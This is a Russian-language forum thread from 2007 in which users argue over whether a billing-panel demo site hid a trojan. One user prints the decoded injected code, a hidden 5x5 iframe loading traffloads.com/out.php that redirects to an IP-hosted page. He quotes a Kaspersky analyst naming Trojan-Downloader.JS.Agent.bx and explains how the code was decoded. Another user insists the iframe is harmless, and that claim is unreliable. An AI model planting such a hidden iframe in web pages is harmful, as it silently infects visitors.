Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить?? Чессно говоря...а то уже запарило это *****(22:33:43 28/01/2007) Тему удалили как я понял и я его не увидел. И передай урсуле, что она возможно уже чей-то бот Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил. *****(22:34:17 28/01/2007) Это гаврила написал И обьясни от куда ты нарыл _______________________________ ****** (23:07:35 28/01/2007) На самом деле в раскодированном виде выглядит это так <IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME> Потом перекидывает сюда http://81.95.146.241/ss21mk2/index.php Ах да Вот письмо от дяди Жени Здравствуйте. 1) На сайте обнаружен зловред (Trojan-Downloader.JS.Agent.bx) 2) На сайте были также недетектируемые нами зловреды - могут возникнуть проблемы. Благодарим за оказанную помощь. --------- С уважением, Юрий Несмачный Вирусный аналитик ЗАО "Лаборатория Касперского" _____________________ Вопрос: позволь узнать как ты раскодировал?
У меня такое было очень часто, но я обезаписл себя отовсех и отовсюду, и теперь я свободен от всех. просто день идет, а я все жив.
Итак обратившись в Лаб Касперского,вот что выдало: Trojan-Downloader.JS.Agent.bx Детектирование добавлено 11 дек 2006 01:09 MSK Обновление выпущено 11 дек 2006 03:08 MSK Поведение Trojan-Downloader, троянский загрузчик У данной программы пока нет описания. Поскольку многие программы являются незначительными модификациями своих предыдущих версий, вам могут помочь описания других версий той же программы — если они есть, то ссылки на них приведены сразу под заголовком страницы. Чтож....теперь вопрос....от куда ты взял его?И ту переходную ссылку? RemaerD Спасибо...
Что именно тебя запарило??? И как попала моя переписка с Ремаёрдом тебе??? Скорее этот вопрос нужно задать Ремаёрду.. Я не собираюсь обьяснять чем делать декод, это знает каждый школьник. Ну так я и общался с Ремаёрдом через пм. Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился. Урсула сбавь обороты. Подслушивать (подглядывать) чужие разговоры неприлично. p.s. Не надо писать мне в пм. Я не даю уроков кодирования ссылок =)
ГАвря,не вижу ничего такого что нельзя выкладывать из нашего с тобой ПМ... Вобщем я остаюсь на своем мнении... УРС ЧмогЕ
Солнце,да не волнуйся ты так! Блин ну ты понимаешь....я незнаю как декод делается твоими методами туплю! Может все таки обьясниш как ты его зделал..в результати чего ты такие космические даные получил? Обороты сам сбавляй,когда понадобится так сразу..ты будешь первый кто узнает+)) А в пм я тебе написала...ну чтоб не заснул+)
Ладно, так и быть, научу тебя =) http://ha.ckers.org/xss.html Отмотаешь страницу вниз, вставишь код в графу HTML (with semicolons): Нажмёш кнопку Decode под этой строкой. Вверху увидишь читаемый текст. Написал подробно, чтоб ты не спросила опять что-нибудь =) Ну на каую кнопку жать или типа того. PHP: http://traffloads.com/out.php?s_id=2 Как видишь, космического нет ничего =) А вообще можно просто сохранить код в .html и открыть файл. Но мне казалось что ремаёрд имея такую репу должен знать об этом. Странно что он тебе не обьяснил это. Ну вы тут полобыбзайтесь, почмокайтесь, а мне честно говоря не хочется обсуждать более это всё. ======== Ах, ну я понял, репы то у вас типа превед +10. Тогда понятно =)
Спасибо большое!+)я не понимаю с чего ты решил что это вирус....... ну выдало ссылку.....но не вимжу я ничего подозрительного Я ремаёрд-а такими вопросами не гружу,так как успеваю итак достать ими ======== нет....+20
Короче Гаврила...все эти кода и ссылки да ..замечательно...просто отлично! Но все же вопрос остается....а фактов так и нет....хмм...каким же макаром ты определил и подумал что там вирус...которого нет? бред какойто!вернее не вирус...а троян..
Мда...я читал но даже не понял о чем тут речь..жаль у меня не так много времени сидеть на ачате...может тогда бы и смог понять о чем речь в этой теме.
Насколько я понял урсула прошла по какой-то вредной ссылке и ее комп превратился в бота...а Гаврила эту ссылку раскодировал полностью? Как сложен этот мир...
Дрэгги Просто я давала ссылку на демо-версию билинг-панели...тогда нужны были програмеры..и для нагладного примера дала ссылку на сайт!Гаврила сказал мол там Трояны...и т.д и т.п. Я смотрела ифреймы и основной код....ничего там нету подозрительного!Там был обычный ифрейм с загрузчиком..он утверждает,что там трояны....но их там нету....=\ я сама ниче не понимаю...из того,что он говорит!
Фига се. Обычный ифрейм с загрузчиком =)))) Звучит как - да подумаешь, тебе троян установился. Делов то! =)))) ... p.s. участникам темы читать что такое довнлоадер и нафига его вообще используют (для чего)
Да нет... мой комп не превратился в бота!это ИМХо и зловредной ссылки тоже не было! пЫсЫ:я боюсь если выложу кода...то будут возражения...мол вирусы вылаживаю! Гаврила как раз утверждает что что ботов эта херь собирала для доссов